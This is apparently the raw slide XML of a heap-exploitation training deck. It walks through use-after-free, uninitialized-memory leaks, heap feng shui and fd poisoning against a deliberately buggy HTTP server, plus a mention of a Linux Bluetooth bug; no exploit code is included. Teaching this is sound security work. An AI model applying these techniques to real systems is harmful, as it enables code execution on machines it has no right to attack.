          <a:ext cx="2550671" cy="7652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560" tIns="201560" rIns="201560" bIns="20156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Exploit</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5326580" y="346268"/>
        <a:ext cx="2550671" cy="765201"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{173132A0-8F0E-5A46-9688-8CF324862B5C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5326580" y="1111470"/>
          <a:ext cx="2550671" cy="180576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950" tIns="251950" rIns="251950" bIns="25195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Information leak for </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" kern="1200" dirty="0" err="1"/>
            <a:t>libc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
            <a:t> and heap addresses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after free for code execution</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5326580" y="1111470"/>
        <a:ext cx="2550671" cy="18057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42561-1B2B-3143-93AF-C9A1E0E2B25B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1311048" y="2231"/>
          <a:ext cx="2506953" cy="15041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Source to Sink</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1311048" y="2231"/>
        <a:ext cx="2506953" cy="1504172"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5B652EDA-D011-4E42-9A75-B4BB634D452B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4068697" y="2231"/>
          <a:ext cx="2506953" cy="15041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Sink to Source</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4068697" y="2231"/>
        <a:ext cx="2506953" cy="1504172"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{71343DB3-A64C-AE49-BAFB-AACF1BC2BC64}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2689873" y="1757099"/>
          <a:ext cx="2506953" cy="15041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Pattern Matching</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2689873" y="1757099"/>
        <a:ext cx="2506953" cy="15041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4FF91-5414-5D44-8797-C579B022DE73}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="313071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8D182-4098-A040-84EA-BF13153C3C00}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="47391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Uninitialized Memory </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="420274" y="73330"/>
        <a:ext cx="5468812" cy="479482"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B2B2437E-A3F0-614E-9862-B6D2D1DAF289}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="112955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57186-8BE0-314E-99F1-B94DBE6E2488}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="86387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after free read</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="420274" y="889811"/>
        <a:ext cx="5468812" cy="479482"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{89AD06F3-BF00-7145-8B03-1BCA279280F8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="194603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3BF18-2193-C44A-A20B-65338489AC29}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="168035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 of bounds read</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="420274" y="1706291"/>
        <a:ext cx="5468812" cy="479482"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{120E51CA-335C-E044-B1D4-4611BAE02C76}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="276251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396B2-B749-A146-97EF-77F9C856450F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="249683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 (not talked about in course) i.e. format strings</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="420274" y="2522771"/>
        <a:ext cx="5468812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BD3B-5BE1-BC49-BD74-96BCC9800964}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="219921"/>
          <a:ext cx="770943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Easy way to control the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" b="1" i="1" u="sng" kern="1200"/>
            <a:t>shape</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200"/>
            <a:t> of the heap</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31613" y="251534"/>
        <a:ext cx="7646212" cy="584369"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{46C2DB11-403D-084C-9CEE-E4C6D43A4FD7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="945276"/>
          <a:ext cx="770943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Calls to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="27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malloc() </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200" dirty="0"/>
            <a:t>&amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="27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free() </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200" dirty="0"/>
            <a:t>with lots of control</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31613" y="976889"/>
        <a:ext cx="7646212" cy="584369"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ABBE7F2A-F497-DB4E-B666-CE6AE87251AF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1670632"/>
          <a:ext cx="770943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u="sng" kern="1200"/>
            <a:t>Amount</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200"/>
            <a:t> of allocations/frees</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31613" y="1702245"/>
        <a:ext cx="7646212" cy="584369"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BB096D44-F5EE-3F49-94B3-3DC92C39AA3C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2395987"/>
          <a:ext cx="770943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u="sng" kern="1200"/>
            <a:t>Size</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200"/>
            <a:t> of allocations/frees</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31613" y="2427600"/>
        <a:ext cx="7646212" cy="5843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09741-BCF9-496F-93DB-5ED46C7DE7D9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1131974" y="11751"/>
          <a:ext cx="1921500" cy="1921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9F4EC-ADC8-4A2B-8B80-76608FFCA641}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1541474" y="421251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8EB95-1FD8-4043-9E37-704C714EB774}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="517724" y="2531752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Allocator based techniques don’t always work</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="517724" y="2531752"/>
        <a:ext cx="3150000" cy="720000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C102885D-AD41-441B-8AF8-DE058AFDB7A3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4833225" y="11751"/>
          <a:ext cx="1921500" cy="1921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913E4-0101-43A5-9C50-C90938DB4DFB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5242725" y="421251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FAF0E-F629-4D86-9C84-A21BF36CE7C3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4218975" y="2531752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Living off the land</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4218975" y="2531752"/>
        <a:ext cx="315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74668-A517-5249-A4B0-42C941FE4E2C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="341557"/>
          <a:ext cx="7886700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95732" rIns="61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Use </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1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Connection</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
            <a:t> header for another round</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="341557"/>
        <a:ext cx="7886700" cy="807975"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F4D27442-3B5E-4041-A01F-811ED6A65763}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="61117"/>
          <a:ext cx="55206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Towards the end of program </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="421715" y="88497"/>
        <a:ext cx="5465930" cy="506120"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B375430D-94AF-B34E-9E93-A979F7FC1FF8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1532572"/>
          <a:ext cx="7886700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95732" rIns="61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X-Request-Id</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
            <a:t> header</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1532572"/>
        <a:ext cx="7886700" cy="807975"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CCC4A5B2-7D12-644A-8FDC-896B19751B9A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="1252132"/>
          <a:ext cx="55206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Is data controlled in overflow? Yes!</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="421715" y="1279512"/>
        <a:ext cx="5465930" cy="506120"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{34EB131E-ADD7-5543-9F8A-D05C6F05E011}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2723587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272AD-1D9F-4641-9EDC-868BAD3F0E98}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="2443147"/>
          <a:ext cx="55206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Fully controlled size on overflow? Yes!</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="421715" y="2470527"/>
        <a:ext cx="5465930" cy="506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997B0-3E33-5A49-9FBF-07B0FD038352}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0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CB7B2-16D8-7F49-9FB8-AE2A52737AB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="7886700" cy="815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Fd Poison</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="7886700" cy="815875"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0A240A55-8989-C64D-A7B3-8871B2A2D612}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="815875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F0876-EBC3-034F-A124-99E877C84DA0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="815875"/>
          <a:ext cx="7886700" cy="815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Overlapping chunks</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="815875"/>
        <a:ext cx="7886700" cy="815875"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0845AE79-0C4F-EC4C-98A8-7C4C74C03E65}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1631751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075F6-CF4D-B84F-995C-FC8443EB7A11}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1631751"/>
          <a:ext cx="7886700" cy="815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Corrupt other important objects</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1631751"/>
        <a:ext cx="7886700" cy="815875"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DB3C8761-2F71-E84C-9775-EEDD68C4059E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="244762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49052-758F-1A42-AC10-81AEC590F6AD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2447627"/>
          <a:ext cx="7886700" cy="815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Information leaks</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2447627"/>
        <a:ext cx="7886700" cy="8158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1BEC3-D8ED-D446-B7AB-9443EC03CA99}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="417832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6E5C01-D6AC-1443-B4E1-9EE5FFCD4E97}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="63592"/>
          <a:ext cx="552069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Creativity </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="428920" y="98177"/>
        <a:ext cx="5451520" cy="639310"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6EA79D6D-79EB-7E48-B5AA-BFAD847CC03B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1506472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9B1EA-4B27-8247-90E3-36DF8A085054}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="1152232"/>
          <a:ext cx="552069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Heap feng shui</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="428920" y="1186817"/>
        <a:ext cx="5451520" cy="639310"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FCB0B013-4EB6-B24C-B1DB-ADD795E467BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2595112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08956-C922-814C-BE5C-D8A44A268CC1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="2240872"/>
          <a:ext cx="552069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Deep understanding of code</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="428920" y="2275457"/>
        <a:ext cx="5451520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1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47 24575,'-22'0'0,"-2"4"0,-28 1 0,9 0 0,-11 4 0,16-5 0,18 1 0,3-2 0,14-1 0,-3 1 0,3 1 0,-5 0 0,-12 11 0,8-7 0,-20 12 0,22-15 0,-6 5 0,11-6 0,0-1 0,1 3 0,1-3 0,1 3 0,-5 11 0,5-7 0,-10 12 0,11-12 0,-6 3 0,3 6 0,-1-7 0,-2 11 0,4-14 0,1 4 0,-2 6 0,3-9 0,-5 12 0,6-16 0,-3 4 0,1-5 0,-1-1 0,1 1 0,0-1 0,0 0 0,1 1 0,-1 5 0,0-2 0,2 8 0,-2 31 0,2-15 0,0 20 0,0 5 0,-4-25 0,3 46 0,-5-48 0,6 27 0,-3-36 0,3 5 0,0-9 0,2-7 0,-1 0 0,0 2 0,1-6 0,1 10 0,0-10 0,2 6 0,6 2 0,-5-4 0,30 26 0,-24-22 0,24 22 0,-9-17 0,-7-3 0,30 11 0,-32-19 0,15 8 0,3-8 0,-17-5 0,44 1 0,-39-1 0,26-3 0,-11 3 0,-14-5 0,17-2 0,-30 1 0,7-3 0,-10 6 0,-2-2 0,2-2 0,-4 1 0,1-4 0,2-3 0,-1 4 0,6-16 0,-5 12 0,2-13 0,0 3 0,-1 1 0,8-18 0,-5 16 0,0-9 0,-2 0 0,-4 9 0,1-9 0,1-7 0,-2 15 0,4-35 0,-6 35 0,0-22 0,-4-1 0,0 14 0,0-32 0,0 44 0,0-17 0,0 3 0,0 14 0,-4-37 0,0 38 0,-1-19 0,-2 6 0,3 11 0,-5-24 0,6 27 0,-6-12 0,2 15 0,1 3 0,-1-1 0,6 6 0,-1 0 0,-3-4 0,4 4 0,-10-10 0,8 8 0,-5-3 0,1-1 0,1 6 0,-3-6 0,4 7 0,-2-2 0,3 3 0,-1-3 0,-12-3 0,8 2 0,-11-1 0,-5 2 0,8 4 0,-10-3 0,16 5 0,5-1 0,1 4 0,1 1 0,-1 1 0,0 1 0,3-1 0,-2-1 0,1 2 0,-3-2 0,1 4 0,-7-2 0,6 0 0,-5-2 0,7-1 0,1-2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82 24575,'-13'0'0,"0"0"0,-4 0 0,-1 0 0,1 0 0,-7 4 0,9-4 0,-4 4 0,14-2 0,-7 4 0,5 4 0,-13 8 0,8-4 0,-29 18 0,19-13 0,-13 7 0,6-2 0,19-15 0,-9 8 0,14-14 0,3 3 0,-2-1 0,1 2 0,-7 12 0,5-7 0,-8 10 0,10-14 0,-5 4 0,6-5 0,-3 0 0,3 2 0,0-4 0,2 1 0,0 11 0,0-7 0,0 12 0,0-8 0,0 0 0,0 15 0,0-12 0,0 26 0,0-26 0,2 9 0,-2-7 0,2-9 0,0 8 0,1-11 0,-1 0 0,2 2 0,-1-2 0,-1 2 0,2 0 0,-1 3 0,2-2 0,-2 1 0,1-3 0,-1 3 0,1-1 0,4 6 0,-2-2 0,5 3 0,-2 0 0,1-3 0,26 19 0,-23-21 0,24 15 0,-12-16 0,-5-1 0,24 8 0,-27-9 0,9 1 0,-14-2 0,-4-3 0,14 8 0,-12-9 0,9 5 0,0-5 0,-3-1 0,20 4 0,-8-6 0,4 4 0,24-5 0,-24 0 0,67 0 0,-64 0 0,25 0 0,-37 0 0,-13-2 0,8-1 0,-11-1 0,0-1 0,10-14 0,-8 9 0,12-22 0,-11 22 0,0-7 0,-1 7 0,-5 4 0,6-10 0,-9 10 0,7-9 0,-8-10 0,5 4 0,-4-9 0,2-1 0,-3 11 0,0-37 0,0 39 0,0-25 0,-5 5 0,3 18 0,-11-36 0,11 43 0,-9-17 0,6 17 0,-3-1 0,-2-9 0,3 12 0,1-9 0,-4 1 0,2 9 0,-12-25 0,8 24 0,-6-19 0,-6 1 0,4 5 0,-19-24 0,18 24 0,-6-6 0,-3 3 0,15 15 0,-13-11 0,23 18 0,-1 0 0,1 1 0,1 2 0,-3-1 0,-4 1 0,1 2 0,-13 0 0,-25-10 0,9 8 0,-46-14 0,57 13 0,-22-3 0,30 1 0,7 4 0,-4-3 0,13 4 0,1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4/16/22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Toy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things ONLY make sense in the bigger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00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 this for all variables necessary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Other ways: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Concurrency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Improper mutexes/locking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Confusing functions that look like they return a new pointer but DON’T (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strtoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) 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2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Find ‘free(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>begin_request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)’ 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Trace all occurrences of the USE – until no UAF is found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my CODING mistake of freeing ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>begin_request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ too early.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Find the ‘free(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>begin_request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)’  in ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cleanup_request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()’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of this variable within ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>parse_response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()’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64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Normally... Trace all of them. I’m giving you a push in the right direction though.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Would eventually get to this with A LOT of time.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Wrote these bugs accidently!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2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01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Cntrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-F to find all occurrences of this variable being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51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40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35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21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X-Request-Id gets reflected in the response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00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- 0x20 or 0x21 headers sent is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0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 the program as a friend and the primitives it gives us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Trying to emulate a real world situation but guide you in the right direction to speed things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 what is directly in FRONT of the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>res_header_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ - routes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Quick proof of concept for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>write: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0x1F &amp; 0x20 headers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Quick proof of concept for the read – 0x1F, 0x20 headers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Different code paths cause different things!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super viable because of sanity checks in ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>add_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’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Free case: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VERY similar to the write – just FREEING the routes for the exploit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Show freeing and such in GDB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90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Read in ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>send_response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’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Attempts to use POINTERS of type route* as sizes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Write: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Overwrite the pointer to ‘routes’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Gets freed alongside everything else.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Dangling pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uaf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) on the route now!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Free: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Free the route (very similar to the ‘write’)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8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Routes or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>res_header_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[0x20] is a huge list of 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52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res_header_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[0x20] – leads to a very bad header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02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Routes now points to a header!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zooming in on the ROUTES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53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res_header_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[0x20]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Freeing the route pointer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UAF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Allocate underneath the ‘routes’ pointer to control all routes with function pointers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the proof of concept within Python and GDB!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5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Zooming in on the ROUTES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Type confusion – char* name of header is the same as index 0 of the routes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Possible but hard to exploit because we DON’T control ALL of the data here in the allocation.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46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real world, you’d look for bugs individually or set up a fuzzing harness.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this case, I’m going to PUSH you to the right bug in order to speed things.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0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Linux Bluetooth stack vulnerability </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Beginning of the chain – uninitialized memory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17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 this for all variables necessary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info leak, the data needs to be sent back as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Knowing your target – how does it work?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08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Compile with the binary with ASAN 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 quick POC for uninitialized memory bug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hexdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> output in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hexdump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93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 this for all variables necessary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info leak, the data needs to be sent back as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35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72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37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Important to KNOW what’s being allocated and freed at certain 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7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Problem: not possible to get a heap leak because the ‘fd’ pointers of a linked list will be null since two chunks of the same size will NEVER be free at the same time </a:t>
            </a:r>
            <a:r>
